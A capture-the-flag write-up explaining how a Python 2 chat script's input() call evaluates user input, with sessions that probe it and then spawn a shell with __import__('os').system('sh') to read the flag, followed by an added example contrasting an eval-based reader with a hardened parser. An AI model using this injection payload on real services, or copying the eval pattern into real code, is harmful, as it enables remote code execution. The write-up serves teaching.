Tags: miscellaneous 

# A Simple Conversation

```
Someone on the internet wants to talk to you. Can you find out what they want?

nc misc.hsctf.com 9001
```

(File(s): attachments/talk.py)

We're talking to a Python script listening on a port of a server. A typical conversation would look like this:

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> 18
Wow!
Sometimes I wish I was 18
Well, it was nice meeting you, 18-year-old.
Goodbye!
```

Let's see what happens when we enter a non-numeric input.

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> abc
Traceback (most recent call last):
  File "talk.py", line 18, in <module>
    age = input("> ")
  File "<string>", line 1, in <module>
NameError: name 'abc' is not defined
```

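The `NameError` raised from `File "<string>"` shows that our input was evaluated as a Python expression rather than read as text. This is Python 2 behaviour, where `input()` is equivalent to `eval(raw_input())`, so we have a code injection vulnerability in the script. Let's verify it by trying to list the variables in the program.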

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> vars()
Wow!
Sometimes I wish I was {'__builtins__': <module '__builtin__' (built-in)>, '__file__': 'talk.py', '__package__': None, 'age': {...}, 'sleep': <built-in function sleep>, '__name__': '__main__', '__doc__': None}
Well, it was nice meeting you, {'__builtins__': <module '__builtin__' (built-in)>, '__file__': 'talk.py', '__package__': None, 'age': {...}, 'sleep': <built-in function sleep>, '__name__': '__main__', '__doc__': None}-year-old.
Goodbye!
```

Awesome. Looks like we've found the solution. Let's spawn a shell.

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> __import__("os").system("sh")
ls
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
talk.py
tmp
usr
var
cat flag.txt
hsctf{plz_u5e_pyth0n_3}
```
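The flag's advice, as an added example that is not part of the original writeup or the challenge's `talk.py`: it models Python 2's `input()` as `eval()` of the line, next to a parser that treats the line as data. The function names and the sample lines are constructed for illustration, and the block runs under Python 3.

```python
# Added example: hypothetical function names, constructed sample input.
# Python 2's input() is equivalent to eval(raw_input()); Python 3's input()
# returns the raw string. Both behaviours are modelled here under Python 3.


def py2_style_input(raw):
    """Model of Python 2 input(): the line is evaluated as an expression."""
    return eval(raw)  # deliberately unsafe: the bug class shown in the sessions


def read_age(raw, lo=0, hi=150):
    """Hardened parser: treat the line as data, accept only a bounded integer."""
    text = raw.strip()
    # isascii() excludes non-ASCII digit characters that isdigit() would accept.
    if not text.isascii() or not text.isdigit():
        raise ValueError("age must be a whole number")
    age = int(text)
    if not lo <= age <= hi:
        raise ValueError("age out of range")
    return age


def classify(raw):
    """Return (unsafe_outcome, safe_outcome) for one line of input."""
    try:
        unsafe = "evaluated to " + type(py2_style_input(raw)).__name__
    except Exception as exc:
        unsafe = "raised " + type(exc).__name__
    try:
        safe = "accepted %d" % read_age(raw)
    except ValueError:
        safe = "rejected"
    return unsafe, safe


if __name__ == "__main__":
    # Constructed sample lines mirroring the sessions above, plus one
    # harmless arithmetic expression.
    for line in ["18", "abc", "vars()", "6 * 3"]:
        print(repr(line), classify(line))
```

Only the literal `18` is accepted by `read_age`; every line that the `eval`-based reader would execute as an expression is rejected before any evaluation happens.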